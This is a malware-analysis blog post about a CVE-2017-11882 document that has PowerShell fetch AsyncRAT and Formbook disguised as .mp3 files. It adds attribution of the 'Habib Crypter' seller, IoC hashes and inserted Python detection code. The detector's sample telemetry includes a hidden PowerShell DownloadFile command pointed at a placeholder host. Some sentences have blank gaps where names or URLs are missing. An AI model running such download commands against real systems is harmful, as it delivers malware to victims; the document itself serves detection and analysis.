The cyber security community has seen many incidents in which threat actors try to evade detection with anti-reversing techniques such as encryption by third-party cryptors sold on underground forums. We will be analysing one such file, which uses PowerShell to download an encoded PE file disguised as an .mp3 and relies on a cryptor to evade detection.

The kill chain starts with a spam document, but instead of using a macro (the go-to technique for threat actors), the doc file exploits the CVE-2017-11882 vulnerability to drop and execute a VBS script named FUDBypass.vbs. FUDBypass.vbs is responsible for spawning the PowerShell process, as depicted in Figures 1 and 2, to download the encoded PE files from hxxp://www[.] as depicted in Figures 3 and 4.
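The chain described above (Equation Editor exploit, script host, PowerShell download of a file carrying a media extension) is the kind of parent/child relationship a defender can alert on from process-creation telemetry. The following is an added example, not tooling from the original post: it assumes CVE-2017-11882 is exploited through the Equation Editor binary EQNEDT32.EXE, and the log lines are constructed, pipe-separated ProcessCreate events, not real data.

```python
"""Flag the execution chain: EQNEDT32.EXE -> wscript.exe -> powershell.exe
downloading a remote file whose extension claims to be a media file."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Children that Equation Editor has no legitimate reason to spawn.
CHILD_OF_EQNEDT = SCRIPT_HOSTS | {"cmd.exe", "powershell.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I,
)
# A URL or drop path ending in a media extension (the .mp3 trick in the write-up).
MEDIA_EXT_RE = re.compile(r"\S+\.(?:mp3|wav|jpg|png)\b", re.I)

# Constructed sample telemetry (not real data): one benign event, then the chain.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe",
    r"ParentImage=C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
    r"|Image=C:\Windows\System32\wscript.exe"
    r"|CommandLine=wscript.exe C:\Users\victim\AppData\Local\Temp\FUDBypass.vbs",
    r"ParentImage=C:\Windows\System32\wscript.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -w hidden (New-Object Net.WebClient).DownloadFile("
    r"'hxxp://example[.]invalid/track.mp3','C:\Users\victim\AppData\Local\Temp\track.mp3')",
]


def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict (values may contain '=' but not '|')."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return PureWindowsPath(path).name.lower()


def evaluate_event(event):
    """Return the names of every rule the event matches."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent == "eqnedt32.exe" and image in CHILD_OF_EQNEDT:
        hits.append("equation_editor_spawns_script_host")
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and DOWNLOAD_RE.search(cmd):
        hits.append("script_host_powershell_download")
    if image == "powershell.exe" and DOWNLOAD_RE.search(cmd) and MEDIA_EXT_RE.search(cmd):
        hits.append("download_with_media_extension")
    return hits


def scan(lines):
    """Run every rule over every event; returns (event index, rule name) pairs."""
    findings = []
    for idx, line in enumerate(lines):
        for rule in evaluate_event(parse_event(line)):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The first two rules are high-confidence on their own; the media-extension rule is noisier and is best used to raise the severity of a hit on the other two rather than as a standalone alert.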

Figure 1: FUDBypass.vbs
Figure 2: Decoded FUDBypass.vbs

The threat actors also reference people from the research community, such as Florian Roth (Twitter handle @Cyb3rops) in Figure 2 and Malwarebytes and ZoneAlarm in Figure 1, as a way to challenge or provoke a mention somewhere on social media so that the threat actor can become famous.

Figure 3: Encoded Formbook malware
Figure 4: Encoded AsyncRat module

Two encoded PE files were downloaded; after decoding them we concluded that the first file was AsyncRAT v0.5.6B protected by a cryptor and the second was Formbook malware. Analysing each file in detail reveals some interesting information.

File 1: AsyncRAT v0.5.6B

Even though the file is protected by a cryptor, the cryptor fails to hide the PDB file path, from which some valuable information can be extracted, as shown in Figure 5.

Figure 5: AsyncRAT v0.5.6B

From Figure 5 it is evident that they have used AsyncRAT. It also shows a username in the file path, so we checked whether Twitter had anything on the username shown in Figure 5, since Twitter can be considered a gold mine for researchers. As suspected, the same username had already been reported by MalwareHunterTeam, as depicted in Figure 6, where they referenced Twitter handles such as Vitali Kremez (@VK_Intel), Malwrologist (@DissectMalware) and Securisec (@securisec) for popularity.
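The leftover PDB path (Figure 5) is what gave up the username in the first place, and the decoded download has to be recognised as a PE before any of this matters. The following is an added example, not the blog's own tooling: it locates the CodeView "RSDS" record that Microsoft linkers embed (signature, 16-byte GUID, 4-byte age, NUL-terminated path) and pulls the account name and binary name out of the path. The sample blob, path and username are constructed for this example.

```python
"""Recover PDB-path indicators from a decoded PE blob."""
import re
import struct
from pathlib import PureWindowsPath

# Constructed sample; the path and username are invented for this example.
SAMPLE_PDB = rb"C:\Users\demo_user\Desktop\Client\obj\Release\Client.pdb"
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62          # fake DOS header (only the magic matters here)
    + b"\x90" * 40                # filler standing in for code/data
    + b"RSDS"                     # CodeView signature
    + bytes(range(16))            # GUID
    + struct.pack("<I", 1)        # age
    + SAMPLE_PDB + b"\x00"        # NUL-terminated PDB path
    + b"\x00" * 16
)


def looks_like_pe(data):
    """True when the bytes start with the DOS 'MZ' magic, whatever the file
    extension claims (the encoded download was served as .mp3; once decoded,
    the PE magic is what should be checked)."""
    return data[:2] == b"MZ"


def extract_pdb_paths(data):
    """Return every path stored in an RSDS record: skip GUID (16) and age (4),
    then read up to the NUL terminator.  Only keeps hits that end in .pdb so a
    chance 'RSDS' byte sequence elsewhere does not produce garbage."""
    paths = []
    for m in re.finditer(b"RSDS", data):
        start = m.end() + 16 + 4
        end = data.find(b"\x00", start)
        if end == -1:
            continue
        try:
            path = data[start:end].decode("utf-8")
        except UnicodeDecodeError:
            continue
        if path.lower().endswith(".pdb"):
            paths.append(path)
    return paths


# Build paths under a user profile: <drive>:\Users\<name>\...
USER_DIR_RE = re.compile(r"^[a-z]:\\users\\([^\\]+)\\", re.I)


def pdb_indicators(path):
    """Derive the pivot points an analyst would take from the path."""
    m = USER_DIR_RE.match(path)
    return {
        "path": path,
        "username": m.group(1) if m else None,
        "binary": PureWindowsPath(path).stem,
    }


def analyse(data):
    return {
        "is_pe": looks_like_pe(data),
        "pdb": [pdb_indicators(p) for p in extract_pdb_paths(data)],
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_BLOB))
```

A real PE stores the RSDS record at the offset given by the debug directory, but scanning for the signature works on packed or partially unpacked samples where the headers are not trustworthy, which is exactly the situation a cryptor leaves you in.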

Figure 6: Previous encounter of the same username

Next we tried googling the username to see if we could get more information, but the first page of search results was a bummer. However, we decided to look at the second page and found something interesting. The meme “The best place to hide a dead body is page 2 of Google search results” came true in this instance.

What did we find on the second page?

We got a reference to a Gitter page where this user was sharing a Discord server on the topic of reverse engineering, as depicted in Figure 7. That led us to two more Discord servers, depicted in Figure 8, where this user was a founder and was selling a custom cryptor named Habib Crypter to other threat actors and script kiddies.

Figure 7: 2nd page of Google search

Figure 8: Two Discord servers related to the same threat actor’s name

At this stage we decided to spend a few more days reading the chat there to find more clues, and we found that they were selling this cryptor on more than three domains, such as www[.]Habibprotector[.]com, www[.]Habibcrypter[.]com and pzw73897[.]cn, and that it was also available via Google Drive cloud storage, as depicted in Figure 9. We were also able to retrieve the Gmail address associated with that cloud storage.

Figure 9: Cryptor shared via cloud storage

Searching further, we landed on a security technology and social media forum called where the actor had been selling Habib Crypter for some time, as depicted in Figure 10. From his recent activity and posted comments we can see that he was using AsyncRAT for testing his cryptor, as depicted in Figure 11, confirming our observation that the threat actor had access to AsyncRAT’s client and server console from the very beginning.

Figure 10: Threat actor in
Figure 11: Threat actor’s comment on AsyncRAT usage

Apart from these, they were also using YouTube to advertise their product. In the video the threat actor encrypts AsyncRAT using Habib Crypter and, instead of running it in a VM, runs it on his host machine for the first time, which was logged in the AsyncRAT C2 panel as depicted in Figure 12. From the image it is clear that the host machine’s username is the threat actor’s and the region is the United States. However, the left pane of the File Explorer window shows its descriptions in Spanish.

Figure 12: YouTube video from the threat actor’s channel

The threat actor also has access to other RATs such as LuminosityLink RAT, NjRAT and Revenge RAT, which can be found on AnyRun along with Habib Crypter.exe. So far we have seen how the threat actor has been advertising his product and that he had access to several RATs, but we do not know who the actor really is. If we take a close look at Figure 8, the admin is common to both servers. We followed the YouTube link given in the admin’s Discord profile and retrieved the Gmail address linked to the YouTube channel, as depicted in Figure 13.

Figure 13: YouTube channel of the admin

According to the YouTube channel, the admin’s region is Thailand. We found a post by the admin on the tuts4you site related to cracking a program protected by Habib Crypter. He also mentioned that Habib is a good friend of his and that he needs to test how strong the cryptor is, as depicted in Figure 14. However, the region given when the user created his login is South Korea.

Figure 14: Admin’s post on tuts4you

We also found a different YouTube channel advertising the Habib protector, named Abarcy product. In one of the videos it uploaded, captioned “How to Steal & Login Discord Token”, a closer look at the screenshot shows him using Abarcy autobuilder v2 by Prab#0389 with the Prab folder open, as depicted in Figure 15; Prab is the name of the admin we saw before.

Figure 15: Video from the channel Abarcy Product

Abarcy product also has a site hosted on (which is the easiest way to share all your links) which used the image previously used by the admin, and its link to the Discord server was the same as the admin’s server.

Figure 16: Abarcy link and the image used

Still, at the end of the day we cannot point fingers at a single person behind this file, but we do have two Gmail addresses, one retrieved from the Google Drive cloud storage and one from the admin’s YouTube channel, and we are confident that these files are linked to the persons behind these email addresses and/or that they could be part of an even bigger group.

File 2: Formbook

The second encoded file downloaded is Formbook, which is responsible for stealing credentials from the infected system. Formbook tries to load a DLL file from Mozilla Firefox in an attempt to steal credentials, as depicted in Figure 17.

Figure 17: Process tree, courtesy of AnyRun

This Formbook module is similar to the file we analysed in the previous blog, where Formbook was delivered from Google Drive cloud storage. The encoding method of the Formbook binary is exactly the same as in the previous blog, and was also seen in the Gorgon APT campaign in the second half of 2019.

As we always recommend, ignore emails from unknown sources that you have not been expecting, to avoid becoming a victim of such malicious attacks. Use a reputed security product such as K7 Total Security to stay safe from cyber threats.

Indicators of Compromise (IoCs)

Hash (MD5)                        File Name      K7 Detection Name
17650AA34ABEDB43C6D30CE0F5FB5FFC  FUDBypass.vbs  Trojan ( 0001140e1 )
63A69DE53AF8157C58CBCD59E9777C39  AsyncRAT       Trojan ( 005672a71 )
7C711C9E227D455A131A223EEA423CBE  Doc file       Trojan ( 0001140e1 )
BD3DD549F4739F56A5499E09B14C6466  AsyncRAT       Trojan ( 005692101 )
BDBA127F936B91D20C1FAF48B9DD915E  AsyncRAT       Trojan ( 005672a71 )
DDDFC3DF243681F83B7989CB695618D6  Formbook       Trojan ( 00536d121 )



